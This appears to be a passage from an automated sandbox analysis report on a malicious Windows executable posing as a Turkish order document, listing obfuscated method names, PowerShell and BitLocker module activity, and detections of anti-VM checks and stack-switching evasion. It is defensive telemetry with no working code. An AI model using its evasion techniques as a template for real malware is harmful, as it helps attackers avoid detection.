            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, idQ27mYX9UnZa99BEF.csHigh entropy of concatenated method names: 'uTKlIXr3x6', 'Y1flx8nGUr', 'rWUl782GWp', 'FoxlBu2BT2', 'ebilO5Bqdi', 'hKelTPcIMC', 'E82lEp1rmc', 'O5MtuQCL2p', 'iU7tGasi2k', 'QHdt5OJAkh'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, YE9vLiO8DUROdAZd9B.csHigh entropy of concatenated method names: 'Dispose', 'bCnI53lTrG', 'Rr22ZSBWus', 'cpBQQRxGfm', 'qftIYehnoN', 'JTQIzwATOP', 'ProcessDialogKey', 'dpc2PxBfQn', 'Q6S2IVB5Rc', 'Pax22TdQ27'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, i7RJE7XwppAcletnM9.csHigh entropy of concatenated method names: 'yODoGhtkPN', 'IYAoYfAb33', 'Re8tPvGY92', 'EVctIRc84v', 'kb6oqQbvlg', 'MjCoMqwAIr', 'cdCoNiYp2w', 'yVkow8udsG', 'd4RoDjNjO6', 'vRloK7RiRf'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, PO2kQtp1JBrSKZQBcm.csHigh entropy of concatenated method names: 'NoEmWE5l2L', 'FkrmaRbqXa', 'HRWmJkMyrX', 'GPUmjZYest', 'nPjmrGyUL7', 'blcmV8HKeJ', 'cYNmL1xN10', 'qBtm97Jpxv', 'B0fmy8yiPe', 'awYmFjr5Ks'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, QC27IVIPJyY2iLVvXQY.csHigh entropy of concatenated method names: 'KdplWYH0Ml', 'sFMlaqbkXa', 'a3NlJ8gB2Q', 'RFHljLyiL1', 'OFglrmtVvM', 'A89lVqG2So', 'KpmlLFlTys', 'gdTl9bDrby', 'VUhlyr0ZdV', 'lb0lFJeBgK'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, NLihc4KTvML7Gt74oU.csHigh entropy of concatenated method names: 'ToString', 'BbwRq4JXtt', 'opbRZhKK21', 'eJaR4c3as1', 'VBVR0pYk8K', 'AGVRigmUy9', 'QKhReMWdUf', 'k58Rs9wZ39', 'b77RQgU6cB', 'm65Rp1udWL'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, RZotG5zHlXj2AtOOx9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ScalkaU14N', 'jWUlC5HwS4', 'LIelRFogfi', 't6Qlos33iZ', 'T9rltpnBqs', 'AiollAvA21', 'oKsl3AdL9H'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, BYAiMKsC49DgNV7vk5.csHigh entropy of concatenated method names: 'ULSmBQkgQW', 'RFamhxx65Z', 'LeSmELBckh', 'WNbEYJAEnL', 'wGpEzFwBiP', 'mwJmP78hOx', 'qRymIfTHKS', 'BPCm249Vbf', 'a0LmxUdGmf', 'gfMm7hioCe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, fOm1m09TqPZZgHoxih.csHigh entropy of concatenated method names: 'PjpOwCR3tb', 'rOwOD200R5', 'oplOKCo47L', 'a1MOgiWKR1', 'qMlOUxCXMX', 'KSKOXbAMFI', 'E2AOuVPvbS', 'SyLOGsuwer', 'GqxO5vgW8m', 'jgUOYgf1X8'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, KYYaPOIITSshMUwPMtC.csHigh entropy of concatenated method names: 'ToString', 'IdY3xy1caF', 'q1x37g5j8T', 'ktS3be0q64', 'bYP3B6W2V6', 'COm3OhYwcR', 'qjK3hG4h8Z', 'Neq3TYjo0A', 'oQfMGJMQ16jq5yeisva', 'WBlT3LMNWrqHclbvcyq'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, DUJu7MF7E5pcBffxuY.csHigh entropy of concatenated method names: 'NxPTrnaCt2', 'OICTL9ZiiZ', 'duoh4rE8S1', 'Ea2h0saNwJ', 'SUMhiyQnbN', 'VykheTUJsq', 'dL3hsb7ZWN', 'Or1hQxHvt6', 'Qu2hpi6Ls4', 'YgFhvt6wr0'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, QHdg36IxiiKlOn5o3Cc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zOP3wK4pRh', 'td33DeLcXr', 'xfN3KG2BgB', 'Obr3gIkBIa', 'ho73UcXX7T', 'T2K3XxKsTg', 'zwC3uYILeT'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, xtehnoGNiTQwATOPxp.csHigh entropy of concatenated method names: 'ORFtBSd1Rd', 'pWXtOjsrxf', 'XXMthBG5q0', 'n9NtTxkVW3', 'kkbtEsnpPb', 'WMptmsLk0e', 'iMCtnq4icE', 'Uy2tdsEtha', 'gdUtSPjntU', 'UJYt6OBMjI'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, UnGAfJ2eZZ7CCMnQjv.csHigh entropy of concatenated method names: 'lh2JPVEpC', 'n2mjjeINH', 'webV9O0Y1', 'ViULjxrGm', 'nl9yy8Lvb', 'pIMF5Vban', 'oGJxuoIaDxtZZe0KAy', 'oVK1LkKD8HLGMKr1jq', 'eGGtgGebp', 'PBy3PXGCa'
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeFile created: \03.07.2024-sipari#u015f ug01072410 - onka ve tic a.s .exe
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeFile created: \03.07.2024-sipari#u015f ug01072410 - onka ve tic a.s .exe
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeFile created: \03.07.2024-sipari#u015f ug01072410 - onka ve tic a.s .exeJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeFile created: \03.07.2024-sipari#u015f ug01072410 - onka ve tic a.s .exeJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe PID: 7512, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 1270000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeMemory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
